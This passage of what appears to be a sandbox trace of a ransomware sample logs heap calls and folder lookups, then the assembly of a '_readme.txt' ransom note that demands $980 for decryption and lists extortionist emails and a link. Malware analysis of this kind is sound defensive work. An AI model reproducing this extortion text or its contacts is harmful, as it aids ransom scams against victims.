0x31cf750 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.831] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.831] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.833] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.836] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.836] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.836] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.836] PathFindFileNameW (pszPath="") returned="" [0090.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.836] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.837] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.837] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.837] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0090.838] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0090.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.838] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0090.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.838] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.838] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for 